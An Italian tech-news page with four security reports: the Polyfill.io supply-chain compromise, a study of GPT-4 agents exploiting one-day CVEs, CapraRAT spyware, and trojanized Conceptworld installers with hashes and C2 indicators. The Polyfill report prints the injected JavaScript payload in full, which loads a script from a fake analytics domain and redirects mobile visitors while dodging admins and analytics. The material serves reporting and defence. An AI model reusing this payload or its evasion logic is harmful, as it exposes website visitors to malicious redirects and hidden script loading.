Sicurezza Informatica
Attacco alla Supply Chain di Polyfill: oltre 100.000 siti coinvolti
Tempo di lettura: 2 minuti. Attacco alla supply chain di Polyfill compromette oltre 100.000 siti, iniettando malware tramite cdn.polyfill.io.
![](https://www.matricedigitale.it/wp-content/uploads/2024/06/aldebaran33_wordpress_hacking_da99ac16-93c2-4d37-ad56-b8d05e0bc11a.jpg)
Un attacco alla supply chain ha colpito il popolare script polyfill.js
, utilizzato da oltre 100.000 siti web per supportare browser più vecchi. Questo attacco ha compromesso il dominio e l’account GitHub di polyfill.io, iniettando malware nei siti che utilizzano questa libreria, colpendo utenti di alto profilo come JSTOR, Intuit e il World Economic Forum.
Dettagli dell’Attacco
Nel febbraio di quest’anno, una compagnia cinese ha acquistato il dominio cdn.polyfill.io
e l’account GitHub associato. Da allora, il dominio è stato utilizzato per distribuire malware sui dispositivi mobili attraverso qualsiasi sito che integra cdn.polyfill.io
. Gli utenti mobili venivano reindirizzati a un sito di scommesse sportive tramite un falso dominio di Google Analytics (www.googie-anaiytics.com
).
Aspetto | Dettagli |
---|---|
Data di Inizio | Febbraio 2024 |
Dominio Compromesso | cdn.polyfill.io |
Utenti Notabili | JSTOR, Intuit, World Economic Forum |
Metodo di Infezione | Malware iniettato dinamicamente basato su header HTTP |
Reindirizzamento | Sito di scommesse sportive |
Meccanismo dell’Attacco
Il codice di polyfill.js
è stato alterato per generare dinamicamente script malevoli basati sugli header HTTP, attivandosi su dispositivi mobili specifici a determinate ore e ignorando gli utenti amministratori o quelli monitorati da servizi di analisi web.
Esempio di Payload Malevolo
javascriptCopia codicefunction isPc() {
try {
var _isWin = navigator.platform == "Win32" || navigator.platform == "Windows",
_isMac = navigator.platform == "Mac68K" || navigator.platform == "MacPPC" ||
navigator.platform == "Macintosh" || navigator.platform == "MacIntel";
return _isMac || _isWin;
} catch (_0x44e1f6) {
return false;
}
}
function vfed_update(_0x5ae1f8) {
_0x5ae1f8 !== "" &&
loadJS("https://www.googie-anaiytics.com/html/checkcachehw.js", function () {
if (usercache == true) {
window.location.href = _0x5ae1f8;
}
});
}
function check_tiaozhuan() {
var _isMobile = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i);
if (_isMobile) {
var _curHost = window.location.host,
_ref = document.referrer,
_redirectURL = "",
_kuurzaBitGet = "https://kuurza.com/redirect?from=bitget",
_rnd = Math.floor(Math.random() * 100 + 1),
_date = new Date(),
_hours = _date.getHours();
if (_curHost.indexOf("www.dxtv1.com") !== -1 || _curHost.indexOf("www.ys752.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_curHost.indexOf("shuanshu.com.com") !== -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_ref.indexOf(".") !== -1 && _ref.indexOf(_curHost) == -1) {
_redirectURL = "https://kuurza.com/redirect?from=bitget";
} else if (_hours >= 0 && _hours < 2 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 2 && _hours < 4 && _rnd <= 15) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 4 && _hours < 7 && _rnd <= 20) {
_redirectURL = _kuurzaBitGet;
} else if (_hours >= 7 && _hours < 8 && _rnd <= 10) {
_redirectURL = _kuurzaBitGet;
} else if (_rnd <= 10) {
_redirectURL = _kuurzaBitGet;
}
if (_redirectURL != "" && !isPc() && document.cookie.indexOf("admin_id") == -1 && document.cookie.indexOf("adminlevels") == -1) {
vfed_update(_redirectURL);
}
}
}
let _outerPage = document.documentElement.outerHTML,
bdtjfg = _outerPage.indexOf("hm.baidu.com") != -1;
let cnzfg = _outerPage.indexOf(".cnzz.com") != -1,
wolafg = _outerPage.indexOf(".51.la") != -1;
let mattoo = _outerPage.indexOf(".matomo.org") != -1,
aanaly = _outerPage.indexOf(".google-analytics.com") != -1;
let ggmana = _outerPage.indexOf(".googletagmanager.com") != -1,
aplausix = _outerPage.indexOf(".plausible.io") != -1,
statcct = _outerPage.indexOf(".statcounter.com") != -1;
bdtjfg || cnzfg || wolafg || mattoo || aanaly || ggmana || aplausix || statcct
? setTimeout(check_tiaozhuan, 2000)
: check_tiaozhuan();
Alternative Sicure e Consigli
L’autore originale di Polyfill raccomanda di non utilizzare più Polyfill, poiché i browser moderni non ne hanno bisogno. Tuttavia, se è ancora necessario, sia Fastly che Cloudflare offrono alternative sicure.
Questo incidente evidenzia l’importanza di monitorare attentamente le dipendenze del software e utilizzare servizi di scansione e monitoraggio, come quelli offerti da Sansec, per proteggere le infrastrutture web dagli attacchi alla supply chain.
Sicurezza Informatica
ChatGPT-4: sfrutta l’87% delle vulnerabilità One-Day
Tempo di lettura: 2 minuti. ChatGPT-4 è in grado di sfruttare l’87% delle vulnerabilità one-day, sollevando preoccupazioni per la sicurezza informatica
![](https://www.matricedigitale.it/wp-content/uploads/2024/04/aldebaran33_cybersecurity_af4d8b2d-da1b-4780-8dfa-51ddaae257f2.jpg)
Una recente ricerca ha rivelato che ChatGPT-4 è in grado di sfruttare l’87% delle vulnerabilità one-day, dimostrando l’efficacia di questi strumenti nell’ambito della sicurezza informatica. Questo risultato solleva preoccupazioni significative per la comunità della cybersecurity.
Con la diffusione di ChatGPT e altri modelli di linguaggio di grandi dimensioni (LLM), la sicurezza informatica è diventata una preoccupazione crescente. Una squadra di ricercatori, composta da Richard Fang, Rohan Bindu, Akul Gupta e Daniel Kang, ha condotto uno studio per determinare l’efficacia di ChatGPT-4 nello sfruttare vulnerabilità one-day, ovvero vulnerabilità conosciute ma ancora non patchate. I risultati sono sorprendenti: ChatGPT-4 ha dimostrato di poter sfruttare queste vulnerabilità con una percentuale di successo dell’87%.
Dettagli dello Studio
Lo studio ha utilizzato 15 vulnerabilità one-day reali, incluse vulnerabilità di siti web, software di gestione dei container e pacchetti Python, tutte provenienti dal database CVE. Gli agenti LLM avevano accesso a elementi di navigazione web, terminali, risultati di ricerca, creazione di file e un interprete di codice.
Il prompt utilizzato dai ricercatori era molto dettagliato, contenendo 1.056 token e 91 righe di codice, comprese dichiarazioni di debug e log. Non sono stati utilizzati sub-agenti o moduli di pianificazione separati. ChatGPT-4 è stato in grado di sfruttare con successo l’87% delle vulnerabilità testate, mentre GPT-3.5 e altri scanner di vulnerabilità open-source non sono riusciti a sfruttare alcuna vulnerabilità.
Successi e limiti di ChatGPT-4
ChatGPT-4 ha fallito in due casi specifici:
- Iris Web App: La navigazione è fatta tramite JavaScript, complicando l’interazione dell’agente con gli elementi necessari.
- HertzBeat: La descrizione dettagliata è in cinese, causando confusione all’agente GPT-4 che utilizza un prompt in inglese.
Efficienza limitata senza il Codice CVE
La ricerca ha mostrato che senza il codice CVE, ChatGPT-4 è riuscito a sfruttare solo il 7% delle vulnerabilità, una riduzione dell’80%. Tuttavia, è stato in grado di identificare la vulnerabilità corretta il 33,3% delle volte. La differenza media nel numero di azioni intraprese con e senza la descrizione CVE era solo del 14%, suggerendo che l’inclusione di un meccanismo di pianificazione e sub-agenti potrebbe migliorare le prestazioni.
Implicazioni Future degli LLM sulle vulnerabilità One-Day
I risultati dello studio indicano che gli LLM hanno la capacità di sfruttare autonomamente le vulnerabilità one-day, ma attualmente solo GPT-4 è in grado di raggiungere questo livello di efficacia. Tuttavia, la capacità e la funzionalità degli LLM continueranno a crescere, rendendoli strumenti sempre più potenti e distruttivi per i criminali informatici.
Gli autori dello studio sottolineano la necessità per la comunità della cybersecurity e i fornitori di LLM di riflettere attentamente su come integrare questi agenti LLM nelle misure di difesa e sulla loro distribuzione su larga scala.
Sicurezza Informatica
Transparent Tribe colpisce con nuove versioni di CapraRat
Tempo di lettura: 2 minuti. CapraTube Remix: lo spyware Android di Transparent Tribe prende di mira giocatori mobili, appassionati di armi e fan di TikTok. Scopri come proteggerti.
![APT36](https://www.matricedigitale.it/wp-content/uploads/2023/03/Aldebaran_transparent_tribe_apt_group_pakistan_real_flag_6badf1e0-13b7-4e17-92cf-2a6a8caaa17b.jpg)
Un nuovo report di SentinelLabs ha rivelato quattro nuovi APK di CapraRAT, collegati all’attore di stato sospettato di essere allineato al Pakistan, noto come Transparent Tribe. Questi APK continuano la tendenza del gruppo di incorporare spyware in applicazioni di navigazione video curate, espandendo il target a giocatori mobili, appassionati di armi e fan di TikTok.
Transparent Tribe, anche noto come APT 36 o Operation C-Major, è attivo dal 2016 e si concentra su attacchi contro personale governativo e militare indiano. Il gruppo utilizza pesantemente attacchi di ingegneria sociale per distribuire vari spyware su Windows e Android, inclusi spear-phishing e attacchi watering hole. La campagna di settembre 2023 di CapraTube utilizzava app Android modificate per imitare YouTube, spesso in un contesto di appuntamenti. La nuova campagna continua questa tecnica, aggiornando il codice per migliorare la compatibilità con le versioni moderne di Android.
Nuovi APK di CapraRAT
![](https://www.matricedigitale.it/wp-content/uploads/2024/07/image-7.jpg)
I nuovi APK di CapraRAT utilizzano WebView per lanciare URL a YouTube o a siti di giochi mobili come CrazyGames. Le app richiedono permessi rischiosi che includono l’accesso alla posizione GPS, la gestione dello stato della rete, la lettura e l’invio di SMS, l’accesso ai contatti, la registrazione audio e video, e l’accesso alla memoria di archiviazione.
Dettagli dei nuovi APK
![](https://www.matricedigitale.it/wp-content/uploads/2024/07/image-7-1-478x1024.jpg)
SHA-1 | Nome App | Nome Pacchetto |
---|---|---|
c307f523a1d1aa928fe3db2c6c3ede6902f1084b | Crazy Game signed.apk | com.maeps.crygms.tktols |
dba9f88ba548cebfa389972cddf2bec55b71168b | Sexy Videos signed.apk | com.nobra.crygms.tktols |
28bc3b3d8878be4267ee08f20b7816a6ba23623e | TikTok signed.apk | com.maeps.vdosa.tktols |
fff24e9f11651e0bdbee7c5cd1034269f40fc424 | Weapons signed.apk | com.maeps.vdosa.tktols |
Funzionalità dello Spyware
Il malware ha la capacità di:
- Rubare credenziali del browser e informazioni sui portafogli di criptovalute.
- Registrare i contenuti degli appunti e i tasti digitati.
- Scaricare ed eseguire payload aggiuntivi.
Il malware persiste tramite un’attività pianificata che esegue il payload principale ogni tre ore.
Indicatori di Compromissione
Domain/IP | Descrizione |
---|---|
shareboxs[.]net | Dominio C2 |
173[.]212[.]206[.]227 | Indirizzo IP C2 risolto |
173[.]249[.]50[.]243 | Indirizzo IP di failover C2 |
Compatibilità e aggiornamenti
Le versioni più recenti di CapraRAT contengono riferimenti ad Android Oreo (Android 8.0), migliorando la compatibilità con le versioni moderne di Android. Le versioni precedenti richiedevano Lollipop (Android 5.1), meno compatibile con i dispositivi moderni. I nuovi APK funzionano senza problemi su Android 13 (Tiramisu) e Android 14.
Le modifiche al codice di CapraRAT suggeriscono che gli sviluppatori si concentrano sulla stabilità e affidabilità dello strumento. L’aggiornamento delle versioni di Android e il ridotto numero di permessi richiesti indicano un’attenzione maggiore alla sorveglianza piuttosto che a un controllo completo del dispositivo. Secondo Sentinel One, autore della scoperta, gli utenti dovrebbero sempre valutare i permessi richiesti da un’app per determinarne la necessità, evitando di concedere permessi non necessari.
Sicurezza Informatica
Supply Chain compromessa con installer Notezilla, RecentX e Copywhiz
Tempo di lettura: 2 minuti. La compromissione della supply chain ha portato alla distribuzione di installer trojanizzati per Notezilla, RecentX e Copywhiz.
![](https://www.matricedigitale.it/wp-content/uploads/2022/02/india-hacker-2500x1667-2500x1667.jpg)
Una recente compromissione della supply chain ha portato alla distribuzione di installer trojanizzati per tre popolari programmi software: Notezilla, RecentX e Copywhiz. Questi installer, distribuiti dal sito ufficiale di Conceptworld, sono stati modificati per eseguire malware che ruba informazioni sensibili dagli utenti.
Il 18 giugno 2024, Rapid7 ha avviato un’indagine su attività sospette in un ambiente cliente. L’indagine ha rivelato che l’installazione di Notezilla, un programma per la creazione di sticky notes su Windows, era la fonte del comportamento sospetto. Gli installer per Notezilla, insieme a quelli per RecentX e Copywhiz, erano stati trojanizzati per eseguire malware che ruba informazioni.
Dettagli della compromissione
![](https://www.matricedigitale.it/wp-content/uploads/2024/07/image-6-1024x322.png)
Conceptworld, un’azienda indiana, offre tre software principali: Notezilla, RecentX e Copywhiz. Gli installer per questi programmi, disponibili sul sito ufficiale di Conceptworld, sono stati modificati per includere malware. I file compromessi non erano firmati e le loro dimensioni non corrispondevano a quelle dichiarate sulla pagina di download, indicando la presenza di malware e delle sue dipendenze.
File compromessi e legitimi
Nome File | SHA256 Hash | Dimensione | Note |
---|---|---|---|
NotezillaSetup.exe | 6f49756749d175058f15d5f3c80c8a7d46e80ec3e5eb9fb31f4346abdb72a0e7 | 17.07 MB | Trojanizzato |
NotezillaSetup.exe | 51243990ef8b82865492f0156ebbb23397173647c02a0d83cf3e3dfb4ef8a6bc | 15.19 MB | Legitimo, firmato |
RecentXSetup.exe | 4df9b7da9590990230ed2ab9b4c3d399cf770ed7f6c36a8a10285375fd5a292f | 15.79 MB | Trojanizzato |
RecentXSetup.exe | a6ad6492e88bdb833d34ac122c266f1fadd9509ecfe0246e283728e4af49f433 | 13.92 MB | Legitimo, firmato |
CopywhizSetup.exe | 2eae4f06f2c376c6206c632ac93f4e8c4b3e0e63eca3118e883f8ac479b2f852 | 14.14 MB | Trojanizzato |
CopywhizSetup.exe | fd8d13123218f48c6ab38bf61d94113b4d97095e59fb415e6aa5d9ada012206e | 12.27 MB | Legitimo, firmato |
Funzionalità del Malware
Il malware incluso negli installer compromessi ha la capacità di:
- Rubare credenziali del browser e informazioni sui portafogli di criptovalute.
- Registrare i contenuti degli appunti e i tasti digitati.
- Scaricare ed eseguire payload aggiuntivi.
Una volta infettato un sistema, il malware persiste tramite un’attività pianificata che esegue il payload principale ogni tre ore.
Analisi tecnica
Rapid7 ha determinato che gli installer trojanizzati per le versioni a 32-bit e 64-bit di Notezilla, Copywhiz e RecentX venivano distribuiti dal sito ufficiale conceptworld[.]com
. Il malware utilizza diverse tecniche per rubare dati e mantenere l’accesso al sistema infettato.
File Malevolo | SHA256 Hash | Note |
---|---|---|
dllBus.bat | 1FA84B696B055F614CCD4640B724D90CCAD4AFC035358822224A02A9E2C12846 | Coordinatore esecuzione payload e esfiltrazione dati |
dllCrt.xml | CDC1F2430681E9278B3F738ED74954C4366B8EFF52C937F185D760C1BBBA2F1D | Crea attività pianificata per la persistenza |
dllCrt32.exe | FDC84CB0845F87A39B29027D6433F4A1BBD8C5B808280235CF867A6B0B7A91EB | Esegue dllCrt.bat |
dllCrt.bat | A89953915EABE5C4897E414E73F28C300472298A6A8C055FCC956C61C875FD96 | Crea attività pianificata usando dllCrt.xml |
dllBus32.exe | 70BCE9C228AACBDADAAF18596C0EB308C102382D04632B01B826E9DB96210093 | Esegue dllBus.bat con argomenti da riga di comando |
Indicazioni per la Mitigazione
Rapid7 raccomanda di verificare l’integrità dei file di software scaricati. Controllare che l’hash del file e le proprietà corrispondano a quelle fornite dal distributore ufficiale e che siano firmate correttamente. Se un installer di Notezilla, RecentX o Copywhiz è stato eseguito su un sistema nell’ultimo mese, è consigliabile controllare segni di compromissione, come l’attività pianificata nascosta Check dllHourly32
.
- Smartphone1 settimana fa
Honor 200 Pro vs. Google Pixel 8 Pro: quale scegliere?
- Smartphone1 settimana fa
Realme GT 6 vs POCO F6: quale scegliere?
- Smartphone1 settimana fa
Galaxy A42 5G, S20 FE e A52s si aggiornano: One UI 6.1.1 arriva presto
- Smartphone1 settimana fa
Samsung dice addio a A51, A41 e M01: resiste l’S21 Ultra
- Tech1 settimana fa
Prezzi di Samsung Galaxy Buds 3, Watch 7 e Watch Ultra Online. Sono dolori
- Tech1 settimana fa
Prezzo del Galaxy Z Flip 6 in Europa, novità Watch e One UI 7
- Smartphone1 settimana fa
OnePlus Ace 3 Pro: oltre 230.000 Pre-Ordini in Cina
- Sicurezza Informatica6 giorni fa
Samsung Galaxy S24 batte in Europa le spedizioni dell’S23